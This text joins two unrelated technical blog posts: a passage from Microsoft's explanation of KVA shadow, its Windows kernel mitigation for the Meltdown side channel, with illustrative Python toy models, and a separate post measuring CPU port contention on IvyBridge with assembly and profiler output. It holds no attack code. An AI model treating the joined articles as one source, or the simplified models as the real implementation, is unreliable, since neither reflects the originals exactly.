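A KTRAP_FRAME then grows downward from this hardware-pushed portion with the software-saved volatile register state.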
When designing KVA shadow, several considerations applied to trap handling while KVA shadow was active: the security requirements had to be met, the performance impact on the system had to be minimized, and the changes to the trap handling code had to be kept as compartmentalized as possible in order to simplify the code and improve maintainability. For example, it is desirable to share as much trap handling code between the KVA shadow and non-KVA shadow configurations as practical, so that it is easier to make changes to the kernel's trap handling facilities in the future.

When KVA shadowing is active, user mode code typically runs with the user mode address space selected. It is the responsibility of the trap handling code to switch to the kernel address space on kernel entry, and to switch back to the user address space on kernel exit. However, additional details apply: it is not sufficient to simply switch address spaces, because the only kernel pages that can be permitted to exist in (or be "shadowed into") the user address space are those that hold contents that are "safe" to disclose to user mode.

The first complication that KVA shadow encounters is that it would be inappropriate to shadow the kernel stack pages for each thread into the user mode address space, as this would allow potentially sensitive, privileged kernel memory contents on kernel thread stacks to be leaked via the rogue data cache load speculative side channel. It is also desirable to keep the set of code and data structures that are shadowed into the user mode address space to a minimum, and if possible, to only shadow permanent fixtures in the address space (such as portions of the kernel image itself, and critical per-processor data structures such as the GDT (Global Descriptor Table), IDT (Interrupt Descriptor Table), and TSS).
This simplifies memory management, as handling setup and teardown of new mappings that are shadowed into user mode address spaces has associated complexities, as would enabling any shadowed mappings to become pageable. For these reasons, it was clear that it would not be acceptable for the kernel's trap handling code to continue to use the per-kernel-thread stack for kernel entry and kernel exit events. Instead, a new approach would be required.

The solution that was implemented for KVA shadow was to switch to a mode of operation wherein a small set of per-processor stacks (internally called KTRANSITION_STACKs) are the only stacks that are shadowed into the user mode address space. Eight of these stacks exist for each processor: the first represents the stack used for "normal" kernel entry events, such as exceptions, page faults, and most hardware interrupts, and the remaining seven transition stacks represent the stacks used for traps that are dispatched using the x64-defined IST (Interrupt Stack Table) mechanism (note that Windows does not presently use all 7 possible IST stacks). When KVA shadow is active, then, the KTSS64.Rsp0 field of each processor points to the first transition stack of each processor, and each of the KTSS64.Ist[n] fields points to the n-th KTRANSITION_STACK for that processor.

For convenience, the transition stacks are located in a contiguous region of memory, internally termed the KPROCESSOR_DESCRIPTOR_AREA, that also contains the per-processor GDT, IDT, and TSS, all of which are required to be shadowed into the user mode address space for the processor itself to be able to handle ring transitions properly. This contiguous memory block is, itself, shadowed in its entirety. This configuration ensures that when a kernel entry event is fielded while KVA shadow is active, the current stack is both shadowed into the user mode address space and does not contain sensitive memory contents that would be risky to disclose to user mode.
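The wiring just described can be modeled very simply: Rsp0 selects transition stack 0 for ordinary traps, and the IST slots select transition stacks 1 through 7. The toy model below is purely illustrative (the base address and stack size are made-up values, not the real kernel layout):

```python
STACK_SIZE = 0x1000  # illustrative stack size, not the real kernel value

def build_descriptor_area(base):
    """Model the per-processor contiguous region holding the 8 transition
    stacks; returns (rsp0, ist) as the TSS would be programmed under KVA
    shadow. Stacks grow down, so each value is the top of one stack."""
    tops = [base + (i + 1) * STACK_SIZE for i in range(8)]
    rsp0 = tops[0]   # transition stack 0: "normal" kernel entry events
    ist = tops[1:8]  # transition stacks 1..7: IST-delivered traps
    return rsp0, ist

rsp0, ist = build_descriptor_area(0x100000)
assert rsp0 == 0x101000       # KTSS64.Rsp0 -> first transition stack
assert len(ist) == 7          # KTSS64.Ist[n] -> n-th transition stack
assert ist[0] == 0x102000
```

Because all eight stacks (plus the GDT, IDT, and TSS) sit in one contiguous block, the whole region can be shadowed into the user address space with a handful of page table entries.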
However, in order to maintain these properties, the trap dispatch code must be careful to push no sensitive information onto any transition stack at any time. This necessitates the first several rules for KVA shadow, which prevent any other memory contents from being stored onto the transition stacks: when executing on a transition stack, the kernel must be fielding a kernel entry or kernel exit event, interrupts must be disabled and must remain disabled throughout, and the code executing on a transition stack must be careful to never incur any other type of kernel trap. This also implies that the KVA shadow trap dispatch code can assume that traps arising in kernel mode are already executing with the correct CR3, and on the correct kernel stack (except for some special considerations for IST-delivered traps, as discussed below).

Fielding a trap with KVA shadow active

Based on the above design decisions, there is an additional set of tasks specific to KVA shadowing that must occur prior to the normal trap handling code in the kernel being invoked for kernel entry trap events. In addition, there is a similar set of tasks related to KVA shadow that must occur at the end of trap processing, if a kernel exit is occurring. On normal kernel entry, the following sequence of events must occur:

1. The kernel GS base value must be loaded. This enables the remaining trap code to access per-processor data structures, such as those that hold the kernel CR3 value for the current processor.

2. The processor's address space must be switched to the kernel address space, so that all kernel code and data are accessible (i.e., the kernel CR3 value must be loaded). This necessitates that the kernel CR3 value be stored in a location that is, itself, shadowed. For the purposes of KVA shadow, a single per-processor KPRCB page that contains only "safe" contents maintains a copy of the current processor's kernel CR3 value for easy access by the KVA shadow trap dispatch code. Context switches between address spaces, and process attach/detach, update the corresponding KPRCB field with the new CR3 value on process address space changes.

3. The machine frame previously pushed by hardware as a part of the ring transition from user mode to kernel mode must be copied from the current (transition) stack to the per-kernel-thread stack for the current thread.

4. The current stack must be switched to the per-kernel-thread stack.

At this point, the "normal" trap handling code can largely proceed as usual, and without invasive modifications (save that the kernel GS base has already been loaded).

Roughly speaking, the inverse sequence of events must occur on normal kernel exit: the machine frame at the top of the current kernel thread stack must be copied to the transition stack for the processor, the stacks must be switched, CR3 must be reloaded with the corresponding value for the user mode address space of the current process, the user mode GS base must be reloaded, and then control may be returned to user mode.

System service call entry and exit through the SYSCALL/SYSRETQ instruction pair is handled slightly specially, in that the processor does not already push a machine frame, because the kernel logically does not have a current stack pointer until it explicitly loads one. In this case, no machine frame needs to be copied on kernel entry and kernel exit, but the other basic steps must still be performed.

Special care needs to be taken by the KVA shadow trap dispatch code for NMI, machine check, and double fault type trap events, because these events may interrupt even normally uninterruptable code. This means that they could even interrupt the normally uninterruptable KVA shadow trap dispatch code itself, during a kernel entry or kernel exit event.
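The kernel-entry and kernel-exit sequences described above can be sketched as a toy state machine. This is purely an illustrative model of the ordering of the steps (GS swap, CR3 load from the shadowed per-processor page, machine-frame copy, stack switch), not real kernel code; all names and values are made up:

```python
def kernel_entry(cpu, thread):
    """Model the KVA shadow kernel-entry sequence."""
    cpu["gs_base"] = cpu["kernel_gs_base"]             # 1. load kernel GS base
    cpu["cr3"] = cpu["prcb_safe_page"]["kernel_cr3"]   # 2. load kernel CR3
    frame = cpu["transition_stack"].pop()              # 3. copy the machine
    thread["kernel_stack"].append(frame)               #    frame across stacks
    cpu["current_stack"] = thread["kernel_stack"]      # 4. switch stacks

def kernel_exit(cpu, thread, user_cr3, user_gs):
    """Model the inverse sequence on return to user mode."""
    cpu["transition_stack"].append(thread["kernel_stack"].pop())
    cpu["current_stack"] = cpu["transition_stack"]
    cpu["cr3"] = user_cr3
    cpu["gs_base"] = user_gs

cpu = {
    "gs_base": "user_gs", "kernel_gs_base": "kernel_gs",
    "cr3": "user_cr3",
    # the shadowed, "safe" per-processor KPRCB page holding kernel CR3
    "prcb_safe_page": {"kernel_cr3": "kernel_cr3"},
    "transition_stack": [("rip", "cs", "rflags", "rsp", "ss")],
    "current_stack": None,
}
thread = {"kernel_stack": []}

kernel_entry(cpu, thread)
assert cpu["cr3"] == "kernel_cr3" and cpu["gs_base"] == "kernel_gs"
assert thread["kernel_stack"] and not cpu["transition_stack"]
```

Note that step 2 only works because the KPRCB page holding the kernel CR3 value is itself shadowed: the trap dispatch code must be able to read it before the address space switch has happened.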
These types of traps are delivered using the IST mechanism onto their own distinct transition stacks, and the trap handling code must carefully handle the case of the GS base or CR3 value being in any state, due to the indeterminate state of the machine at the time these events may occur, and must preserve the pre-existing GS base and CR3 values.

At this point, the basics for how to enter and exit the kernel with KVA shadow are in place. However, it would be undesirable to inline the KVA shadow trap dispatch code into the standard trap entry and trap exit code paths, as the standard trap entry and trap exit code paths could be located anywhere in the kernel's .text code section, and it is desirable to minimize the amount of code that needs to be shadowed into the user address space. For this reason, the KVA shadow trap dispatch code is collected into a series of parallel entry points packed within their own code section within the kernel image, and either the standard set of trap entry points, or the KVA shadow trap entry points, are installed into the IDT at system boot time, based on whether KVA shadow is in use at system boot. Similarly, the system service call entry points are also located in this special code section in the kernel image.

Note that one implication of this design choice is that KVA shadow does not protect against attacks on kernel ASLR using speculative side channels. This is a deliberate decision given the design complexity of KVA shadow, the timelines involved, and the realities of other side channel issues affecting the same processor designs. Notably, processors susceptible to rogue data cache load are also typically susceptible to other attacks on their BTBs (branch target buffers) and other microarchitectural resources that may allow kernel address space layout disclosure to a local attacker that is executing arbitrary native code.
Memory management considerations for KVA shadow

Now that KVA shadow is able to handle trap entry and trap exit, it's necessary to understand the implications of KVA shadowing on memory management. As with the trap handling design considerations for KVA shadow, ensuring the correct security properties, providing good performance characteristics, and maximizing the maintainability of code changes were all important design goals. Where possible, rules were established to simplify the memory management design implementation. For example, all kernel allocations that are shadowed into the user mode address space are shadowed system-wide and not per-process or per-processor. As another example, all such shadowed allocations exist at the same kernel virtual address in both the user mode and kernel mode address spaces and share the same underlying physical pages in both address spaces, and all such allocations are considered nonpageable and are treated as though they have been locked into memory.

The most apparent memory management consequence of KVA shadowing is that each process typically now needs a separate address space (i.e., page table hierarchy, or top level page directory page) allocated to describe the shadow user address space, and that the top level page directory entries corresponding to user mode VAs must be replicated from the process's kernel address space top level page directory page to the process's user address space top level page directory page. The top level page directory page entries for the kernel half of the VA space are not replicated, however, and instead only correspond to a minimal set of page table pages needed to map the small subset of pages that have been explicitly shadowed into the user mode address space. As noted above, pages that are shadowed into the user mode address space are left nonpageable for simplicity.
In practice, this is not a substantial hardship for KVA shadow, as only a very small number of fixed allocations are ever shadowed system-wide. (Remember that only the per-processor transition stacks are shadowed, not any per-thread data structures, such as per-thread kernel stacks.)

Memory management must then replicate any updates to top level user mode page directory page entries between the two process address spaces, as the updates occur, and access bit handling for working set aging and other purposes must logically OR the access bits from both user and kernel address spaces together when a top level page directory page entry is being considered (and, similarly, working set aging must clear access bits in both top level page directory pages when a top level entry is being considered). Similarly, memory management must be aware of both address spaces that may exist for processes in various other edge cases where top-level page directory pages are manipulated.

Finally, no general purpose kernel allocations can be marked as "global" in their corresponding leaf page table entries by the kernel: for KVA shadow protections to be effective, processors susceptible to rogue data cache load must not be able to observe cached virtual address translations for privileged kernel pages that could contain sensitive memory contents while in user mode, and global entries would otherwise remain cached in the processor translation buffer (TB) across an address space switch.

Booting is just the beginning of a journey

At this point, we have covered some of the major areas involved in the kernel with respect to KVA shadow.
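The replication and access-bit bookkeeping just described can be sketched with a toy model, assuming a 512-entry top-level table whose lower 256 slots cover user-mode VAs (as on x64); the helper names are illustrative, not real kernel routines:

```python
USER_SLOTS = range(0, 256)  # lower half of the 512-entry top-level table

def replicate_user_entries(kernel_top, user_top):
    """Copy user-half top-level entries from the process's kernel address
    space top-level page to its shadow user address space top-level page.
    The kernel half is deliberately NOT replicated."""
    for i in USER_SLOTS:
        user_top[i] = kernel_top[i]

def top_level_accessed(kernel_bit, user_bit):
    """Working-set aging must treat a top-level entry as accessed if
    either address space's copy has the accessed bit set."""
    return kernel_bit | user_bit

kernel_top = [0] * 512
user_top = [0] * 512
kernel_top[3] = 0xABC    # some user-half mapping
kernel_top[400] = 0xDEF  # some kernel-half mapping
replicate_user_entries(kernel_top, user_top)
assert user_top[3] == 0xABC   # user-half entry replicated
assert user_top[400] == 0     # kernel half is not replicated
assert top_level_accessed(0, 1) == 1
```

Clearing the accessed bit during aging is the mirror-image operation: both copies of the entry must be cleared, or a stale bit in one table would keep the page looking "hot".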
However, there's much more involved beyond just trap handling and memory management: for example, changes to how Windows handles multiprocessor initialization, hibernate and resume, processor shutdown and reboot, and many other areas were all required in order to make KVA shadow into a fully featured solution that works correctly in all supported software configurations. Furthermore, preventing the rogue data cache load issue from exposing privileged kernel mode memory contents is just the beginning of turning KVA shadow into a feature that could be shipped to a diverse customer base.

So far, we have only touched on the highlights of an unoptimized implementation of KVA shadow on x64 Windows. We're far from done examining KVA shadowing, however; a substantial amount of additional work was still required in order to reduce the performance overhead of KVA shadow to the absolute minimum possible. As we'll see, there are a number of options that have been considered and employed to that end with KVA shadow. The below optimizations are already included with the January 3rd, 2018 security updates to address rogue data cache load.

Performance optimizations

One of the primary challenges faced by the implementation of KVA shadow was maximizing system performance. The model of a unified, flat address space shared between user and kernel mode, with page permission bits to protect kernel-owned pages from access by unprivileged user mode code, is both convenient for an operating system kernel to implement, and easily amenable to high performance user/kernel transitions. The reason why the traditional, unified address space model allows for fast user/kernel transitions relates to how processors handle virtual memory.
Processors typically cache previously fetched virtual address translations in a small internal cache that is termed a translation buffer (or TB, for short); some literature also refers to these types of address translation caches as translation lookaside buffers (or TLBs for short). The processor TB operates on the principle of locality: if an application (or the kernel) has referenced a particular virtual address translation recently, it is likely to do so again, and the processor can save the costly process of re-walking the operating system's page table hierarchy if the requisite translation is already cached in the processor TB.

Traditionally, a TB contains information that is primarily local to a particular address space (or page table hierarchy), and when a switch to a different page table hierarchy occurs, such as with a context switch between threads in different processes, the processor TB must be flushed so that translations from one process are not improperly used in the context of a different process. This is critical, as two processes can, and frequently do, map the same user mode virtual address to completely different physical pages.

KVA shadowing requires switching address spaces much more frequently than operating systems have traditionally done, however; on processors susceptible to the rogue data cache load issue, it is now necessary to switch the address space on every user/kernel transition, which are vastly more frequent events than cross-process context switches. In the absence of any further optimizations, the fact that the processor TB is flushed and invalidated on each user/kernel transition would substantially reduce the benefit of the processor TB, and would represent a significant performance cost on the system. Fortunately, there are some techniques that the Windows KVA shadow implementation employs to substantially mitigate the performance costs of KVA shadowing on processor hardware that is susceptible to rogue data cache load.
Optimizing KVA shadow for maximum performance presented a challenging exercise in finding creative ways to make use of existing, in-the-field hardware capabilities, sometimes outside the scope of their original intended use, while still maintaining system security and correct system operation; several techniques have been developed that substantially reduce the cost.

PCID acceleration

The first optimization, the usage of PCID (process-context identifier) acceleration, is relevant to Intel Core-family processors of Haswell and newer microarchitectures. While the TB on many processors traditionally maintained information local to an address space, which had to be flushed on any address space switch, the PCID hardware capability allows address translations to be tagged with a logical PCID that informs the processor which address space they are relevant to. An address space (or page table hierarchy) can be tagged with a distinguished PCID value, and this tag is maintained with any non-global translations that are cached in the processor's TB; then, on an address space switch to an address space with a different associated PCID, the processor can be instructed to preserve the previous TB contents. Because the processor requires the current address space's PCID to match that of any cached translation in the TB for the purposes of matching translation lookups in the TB, address translations from multiple address spaces can now be safely represented concurrently in the processor TB.

On hardware that is PCID-capable and which requires KVA shadowing, the Windows kernel employs two distinguished PCID values, which are internally termed PCID_KERNEL and PCID_USER. The kernel address space is tagged with PCID_KERNEL, and the user address space is tagged with PCID_USER, and on each user/kernel transition, the kernel will typically instruct the processor to preserve the TB contents when switching address spaces.
This enables the preservation of the entire TB contents on system service calls and other high frequency user/kernel transitions, and in many workloads substantially mitigates almost all of the cost of KVA shadowing. Some duplication of TB entries between user and kernel mode is possible if the same user mode VA is referenced by user and kernel code, and additional processing is also required on some types of TB flushes, as certain types of TB flushes (such as those that invalidate user mode VAs) must be replicated to both user and kernel PCIDs. However, this overhead is typically relatively minor compared to the loss of all TB entries if the entire TB were not preserved on each user/kernel transition.

On address space switches between processes, such as context switches between two different processes, the entire TB is invalidated. This must be performed because the PCID values assigned by the kernel are not process-specific, but are global to the entire system. Assigning different PCID values to each process (which would be a more "traditional" usage of PCID) would preclude the need to flush the entire TB on context switches between processes, but would also require TB flush IPIs (interprocessor interrupts) to be sent to a potentially much larger set of processors — specifically, all of those that had previously loaded a given PCID — which is itself a performance trade-off due to the cost involved in TB flush IPIs.

It's important to note that PCID acceleration also requires the hypervisor to expose CR4.PCID and the INVPCID instruction to the Windows kernel. The Hyper-V hypervisor was updated to expose these capabilities with the January 3rd, 2018 security updates. Additionally, the underlying PCID hardware capability is only defined for the native 64-bit paging mode, and thus a 64-bit kernel is required to take advantage of PCID acceleration (32-bit applications running under a 64-bit kernel can still benefit from the optimization).
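The PCID behavior described above can be captured in a toy TLB model: entries are tagged with a PCID, lookups hit only when the tag matches, flushes of user VAs must be replicated to both PCIDs, and a cross-process switch discards everything. The PCID constants and class below are illustrative values for the sketch, not the real kernel's:

```python
PCID_KERNEL, PCID_USER = 1, 2  # illustrative tag values

class Tlb:
    """Toy PCID-tagged TLB: a lookup hits only when the PCID matches."""
    def __init__(self):
        self.entries = {}  # (pcid, va) -> pa

    def fill(self, pcid, va, pa):
        self.entries[(pcid, va)] = pa

    def lookup(self, pcid, va):
        return self.entries.get((pcid, va))

    def invalidate_va(self, va):
        # A flush of a user VA must be replicated to both PCIDs.
        for pcid in (PCID_KERNEL, PCID_USER):
            self.entries.pop((pcid, va), None)

    def flush_all(self):
        # Cross-process context switch: the PCID values are system-global,
        # not per-process, so the entire TB must be invalidated.
        self.entries.clear()

tlb = Tlb()
tlb.fill(PCID_KERNEL, 0xFFFF800000000000, 0x1000)  # kernel translation
tlb.fill(PCID_USER, 0x00007FF000000000, 0x2000)    # user translation

# A user/kernel transition preserves the TB: both entries still hit.
assert tlb.lookup(PCID_KERNEL, 0xFFFF800000000000) == 0x1000
assert tlb.lookup(PCID_USER, 0x00007FF000000000) == 0x2000
# The user translation does not hit under the kernel PCID.
assert tlb.lookup(PCID_KERNEL, 0x00007FF000000000) is None
```

The key property is the last assertion: because lookups are qualified by PCID, translations from both address spaces can coexist in the TB without one address space ever consuming the other's cached translations.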
User/global acceleration

Although many modern processors can take advantage of PCID acceleration, older Intel Core family processors and current Intel Atom family processors do not provide hardware support for PCID and thus cannot take advantage of that PCID support to accelerate KVA shadowing. These processors do allow a more limited form of TB preservation across address space switches, however, in the form of the "global" page table entry bit. The global bit allows the operating system kernel to communicate to the processor that a given leaf translation is "global" to the entire system, and need not be invalidated on address space switches. (A special facility to invalidate all translations, including global translations, is provided by the processor for cases when the operating system changes global memory translations. On x64 and x86 processors, this is accomplished by toggling the CR4.PGE control register bit.)

Traditionally, the kernel would mark most kernel mode page translations as global, in order to indicate that these address translations can be preserved in the TB during cross-process address space switches while all non-global address translations are flushed from the TB. The kernel is then obligated to ensure that both incoming and outgoing address spaces provide consistent translations for any global translations in both address spaces, across a global-preserving address space switch, for correct system operation. This is a simple matter for the traditional use of kernel virtual address management, as most of the kernel address space is identical across all processes. The global bit, thus, elegantly allows most of the effective TB contents for kernel VAs to be preserved across context switches with minimal hardware and software complexity.

In the context of KVA shadow, however, the global bit can be used for a completely different purpose than its original intention, for an optimization termed "user/global acceleration".
Instead of marking kernel pages as global, KVA shadow marks user pages as global, indicating to the processor that all pages in the user mode half of the address space are safe to preserve across address space switches. While an address space switch must still occur on each user/kernel transition, global translations are preserved in the TB, which preserves the user TB entries. As most applications primarily spend their time executing in user mode, this mode of operation preserves the portion of the TB that is most relevant to most applications. The TB contents for kernel virtual addresses are unavoidably lost on each address space switch when user/global acceleration is in use, and as with PCID acceleration, some TB flushes must be handled differently (and cross-process context switches require an entire TB flush), but preserving the user TB contents substantially cuts the cost of KVA shadowing over the more naïve approach of marking no translations as global.

Privileged process acceleration

The purpose of KVA shadowing is to protect sensitive kernel mode memory contents from disclosure to untrusted user mode applications. This is required for security purposes in order to maintain privilege separation between kernel mode and user mode. However, highly-privileged applications that have complete control over the system are typically trusted by the operating system for a variety of tasks, up to and including loading drivers, creating kernel memory dumps, and so on. These applications effectively already have the privileges required in order to access kernel memory, and so KVA shadowing is of minimal benefit for these applications.
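The user/global inversion described above can be modeled with one function: a CR3 write on a non-PCID processor discards every non-global TB entry, so tagging user pages (rather than kernel pages) as global means the user half survives each transition. A hedged, illustrative sketch:

```python
def switch_address_space(tlb):
    """Model a CR3 write without PCID support: only global-tagged entries
    survive the switch. Under user/global acceleration, KVA shadow tags
    *user* pages as global, inverting the bit's traditional use."""
    return {va: (pa, is_global)
            for va, (pa, is_global) in tlb.items() if is_global}

tlb = {
    0x00007FF000000000: (0x2000, True),   # user page, marked global
    0xFFFF800000000000: (0x1000, False),  # kernel page, never global
}

tlb = switch_address_space(tlb)  # a user/kernel transition occurs
assert 0x00007FF000000000 in tlb      # user TB contents are preserved
assert 0xFFFF800000000000 not in tlb  # kernel translations are lost
```

This trades away the kernel-side TB contents on every transition, which is why PCID acceleration is preferred where the hardware supports it; user/global acceleration is the fallback for pre-Haswell Core and Atom parts.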
KVA shadow thus optimizes highly privileged applications (specifically, those that have a primary token which is a member of the BUILTIN\Administrators group, which includes LocalSystem, and processes that execute as a fully-elevated administrator account) by running these applications only with the KVA shadow "kernel" address space, which is very similar to how applications execute on processors that are not susceptible to rogue data cache load. These applications avoid most of the overhead of KVA shadowing, as no address space switch occurs on user/kernel transitions. Because these applications are fully trusted by the operating system, and already have (or could obtain) the capability to load drivers that could naturally access kernel memory, KVA shadowing is not required for fully-privileged applications.

Optimizations are ongoing

The introduction of KVA shadowing radically alters how the Windows kernel fields traps and exceptions from a processor, and significantly changes several key aspects of memory management. While several high-value optimizations have already been deployed with the initial release of operating system updates to integrate KVA shadow support, research into additional avenues of improvement and opportunities for performance tuning continues. KVA shadow represents a substantial departure from some existing operating system design paradigms, and with any such substantial shift in software design, exploring all possible optimizations and performance tuning opportunities is an ongoing effort.

Driver and application compatibility

A key consideration of KVA shadow was that existing applications and drivers must continue to work. Specifically, it would not have been acceptable to change the Windows ABI, or to invalidate how drivers work with user mode memory, in order to integrate KVA shadow support into the operating system.
Applications and drivers that use supported and documented interfaces are highly compatible with KVA shadow, and no changes to how drivers access user mode memory through supported and documented means are necessary. For example, under a try/except block, it is still possible for a driver to use ProbeForRead to probe a user mode address for validity, and then to copy memory from that user mode virtual address (under try/except protection). Similarly, MDL mappings to/from user mode memory still function as before.

A small number of drivers and applications did, however, encounter compatibility issues with KVA shadow. By and large, the majority of incompatible drivers and applications used substantially unsupported and undocumented means to interface with the operating system. For example, Microsoft encountered several software applications from multiple software vendors that assumed that the raw machine instructions in certain, non-exported Windows kernel functions would remain static or unchanged with software updates. Such approaches are highly fragile and are subject to breaking at even slight perturbations of the operating system kernel code. Operating system changes like KVA shadow, a security update that changed how the operating system manages memory and dispatches traps and exceptions, underscore the fragility of depending on highly unsupported and undocumented mechanisms in drivers and applications.

Microsoft strongly encourages developers to use supported and documented facilities in drivers and applications. Keeping customers secure and up to date is a shared commitment, and avoiding dependencies on unsupported and undocumented facilities and behaviors is critical to meeting the expectations that customers have with respect to keeping their systems secure.

Conclusion

Mitigating hardware vulnerabilities in software is an extremely challenging proposition, whether you are an operating system vendor, driver writer, or an application vendor.
In the case of rogue data cache load and KVA shadow, the Windows kernel is able to provide a transparent and strong mitigation for drivers and applications, albeit at the cost of additional operating system complexity and, especially on older hardware, at some potential performance cost depending on the characteristics of a given workload. The breadth of changes required to implement KVA shadowing was substantial, and KVA shadow support easily represents one of the most intricate, complex, and wide-ranging security updates that Microsoft has ever shipped. Microsoft is committed to protecting our customers, and we will continue to work with our industry partners in order to address speculative execution side channel vulnerabilities.

Ken Johnson, Microsoft Security Response Center (MSRC)

Source: https://blogs.technet.microsoft.com/srd/2018/03/23/kva-shadow-mitigating-meltdown-on-windows/
-
Understanding CPU port contention.

21 Mar 2018

I continue writing about the performance of processors, and today I want to show some examples of issues that can arise in the CPU backend. In particular, today's topic will be CPU port contention. Modern processors have multiple execution units. For example, in the SandyBridge family there are 6 execution ports:

Ports 0,1,5 are for arithmetic and logic operations (ALU).
Ports 2,3 are for memory reads.
Port 4 is for memory writes.

Today I will try to stress this side of my IvyBridge CPU. I will show when port contention can take place, will present easy-to-understand pipeline diagrams, and even try IACA. It will be very interesting, so keep on reading!

Disclaimer: I don't want to describe the nuances of the IvyBridge architecture, but rather to show how port contention might look in practice.

Utilizing full capacity of the load instructions

In my IvyBridge CPU I have 2 ports for executing loads, meaning that we can schedule 2 loads at the same time. Let's look at the first example, where I will read one cache line (64 bytes) in portions of 4 bytes. So, we will have 16 reads of 4 bytes. I make reads within one cache line in order to eliminate cache effects. I will repeat this 1000 times:

max load capacity

; esi contains the beginning of the cache line
; edi contains number of iterations (1000)
.loop:
mov eax, DWORD [esi]
mov eax, DWORD [esi + 4]
mov eax, DWORD [esi + 8]
mov eax, DWORD [esi + 12]
mov eax, DWORD [esi + 16]
mov eax, DWORD [esi + 20]
mov eax, DWORD [esi + 24]
mov eax, DWORD [esi + 28]
mov eax, DWORD [esi + 32]
mov eax, DWORD [esi + 36]
mov eax, DWORD [esi + 40]
mov eax, DWORD [esi + 44]
mov eax, DWORD [esi + 48]
mov eax, DWORD [esi + 52]
mov eax, DWORD [esi + 56]
mov eax, DWORD [esi + 60]
dec edi
jnz .loop

I think there will be no issue with loading values into the same eax register, because the CPU will use register renaming to resolve this write-after-write dependency.
Performance counters that I use

UOPS_DISPATCHED_PORT.PORT_X - Cycles when a uop is dispatched on port X.
UOPS_EXECUTED.STALL_CYCLES - Counts the number of cycles in which no uops were dispatched to be executed on this thread.
UOPS_EXECUTED.CYCLES_GE_X_UOP_EXEC - Cycles where at least X uops were executed per-thread.

The full list of performance counters for IvyBridge can be found here.

Results

I did my experiments on an IvyBridge CPU using the uarch-bench tool.

Benchmark          Cycles  UOPS.PORT2  UOPS.PORT3  UOPS.PORT5
max load capacity  8.02    8.00        8.00        1.00

We can see that our 16 loads were scheduled equally between PORT2 and PORT3: each port takes 8 uops. PORT5 takes the macro-fused uop formed from the dec and jnz instructions. The same picture can be observed if we use the IACA tool (a good explanation of how to use IACA is here):

Architecture - IVB
Throughput Analysis Report
--------------------------
Block Throughput: 8.00 Cycles
Throughput Bottleneck: Backend. PORT2_AGU, Port2_DATA, PORT3_AGU, Port3_DATA

Port Binding In Cycles Per Iteration:
-------------------------------------------------------------------------
| Port   | 0 - DV  | 1   | 2 - D   | 3 - D   | 4   | 5   |
-------------------------------------------------------------------------
| Cycles | 0.0 0.0 | 0.0 | 8.0 8.0 | 8.0 8.0 | 0.0 | 1.0 |
-------------------------------------------------------------------------

N - port number or number of cycles resource conflict caused delay, DV - Divider pipe (on port 0)
D - Data fetch pipe (on ports 2 and 3), CP - on a critical path
F - Macro Fusion with the previous instruction occurred

| Num Of |        Ports pressure in cycles         |    |
|  Uops  | 0 - DV | 1 | 2 - D   | 3 - D   | 4 | 5 |    |
---------------------------------------------------------------------
|   1    |        |   | 1.0 1.0 |         |   |   | CP | mov eax, dword ptr [rsp]
|   1    |        |   |         | 1.0 1.0 |   |   | CP | mov eax, dword ptr [rsp+0x4]
|   1    |        |   | 1.0 1.0 |         |   |   | CP | mov eax, dword ptr [rsp+0x8]
|   1    |        |   |         | 1.0 1.0 |   |   | CP | mov eax, dword ptr [rsp+0xc]
|   1    |        |   | 1.0 1.0 |         |   |   | CP | mov eax, dword ptr [rsp+0x10]
|   1    |        |   |         | 1.0 1.0 |   |   | CP | mov eax, dword ptr [rsp+0x14]
|   1    |        |   | 1.0 1.0 |         |   |   | CP | mov eax, dword ptr [rsp+0x18]
|   1    |        |   |         | 1.0 1.0 |   |   | CP | mov eax, dword ptr [rsp+0x1c]
|   1    |        |   | 1.0 1.0 |         |   |   | CP | mov eax, dword ptr [rsp+0x20]
|   1    |        |   |         | 1.0 1.0 |   |   | CP | mov eax, dword ptr [rsp+0x24]
|   1    |        |   | 1.0 1.0 |         |   |   | CP | mov eax, dword ptr [rsp+0x28]
|   1    |        |   |         | 1.0 1.0 |   |   | CP | mov eax, dword ptr [rsp+0x2c]
|   1    |        |   | 1.0 1.0 |         |   |   | CP | mov eax, dword ptr [rsp+0x30]
|   1    |        |   |         | 1.0 1.0 |   |   | CP | mov eax, dword ptr [rsp+0x34]
|   1    |        |   | 1.0 1.0 |         |   |   | CP | mov eax, dword ptr [rsp+0x38]
|   1    |        |   |         | 1.0 1.0 |   |   | CP | mov eax, dword ptr [rsp+0x3c]
|   1    |        |   |         |         |   | 1.0 |  | dec rdi
|   0F   |        |   |         |         |   |     |  | jnz 0xffffffffffffffbe
Total Num Of Uops: 17

Why do we have 8 cycles per iteration? On modern x86 processors a load instruction takes at least 4 cycles to execute even if the data is in the L1 cache, although according to Agner's instruction_tables.pdf it has a latency of 2 cycles. Even with a latency of 2 cycles, we would expect (16 [loads] * 2 [cycles]) / 2 [ports] = 16 cycles per iteration. But we are running at 8 cycles per iteration. Why does this happen? Well, like most execution units, the load units are pipelined, meaning that we can start a second load on the same port while the first load is still in progress. Let's draw a simplified pipeline diagram and see what's going on. This is a simplified MIPS-like pipeline diagram with the usual 5 pipeline stages:

F (fetch)
D (decode)
I (issue)
E (execute) or M (memory operation)
W (write back)

It is far from the real execution diagram of my CPU; however, I preserved some important constraints of the IvyBridge architecture (IVB):

The IVB front-end fetches a 16B block of instructions in a 16B aligned window in 1 cycle.
IVB has 4 decoders, each of which can decode instructions that consist of a single uop.
IVB has 2 pipelined units for doing load operations.
Just to simplify the diagrams, I assume a load operation takes 2 cycles; the M1 and M2 stages reflect that in the diagram. It needs to be said that I omitted one important constraint: instructions always retire in program order, and in my later diagrams that is broken (I simply forgot about it when I was making those diagrams). Drawing this kind of diagram usually helps me understand what is going on inside the processor and find different sorts of hazards.

Some explanations for this pipeline diagram:

In the first cycle we fetch 4 loads. We can't fetch LOAD5, because it doesn't fit in the same 16B aligned window as the first 4 loads.
In the second cycle we are able to decode all 4 fetched instructions, because they are all single-uop instructions.
In the third cycle we are able to issue only the first 2 loads. One of them goes to PORT2, the other goes to PORT3. Notice that LOAD3 and LOAD4 are stalled (typically waiting in the Reservation Station).
Only in cycle #4 are we able to issue LOAD3 and LOAD4, because we know the M1 stages will be free to use in the next cycle.

Continuing this diagram further, we can see that in each cycle we are able to retire 2 loads. We have 16 loads, and that explains why it takes only 8 cycles per iteration. I made an additional experiment to prove this theory, collecting some more performance counters:

Benchmark          Cycles  CYCLES_GE_3_UOP_EXEC  CYCLES_GE_2_UOP_EXEC  CYCLES_GE_1_UOP_EXEC
max load capacity  8.02    1.00                  8.00                  8.00

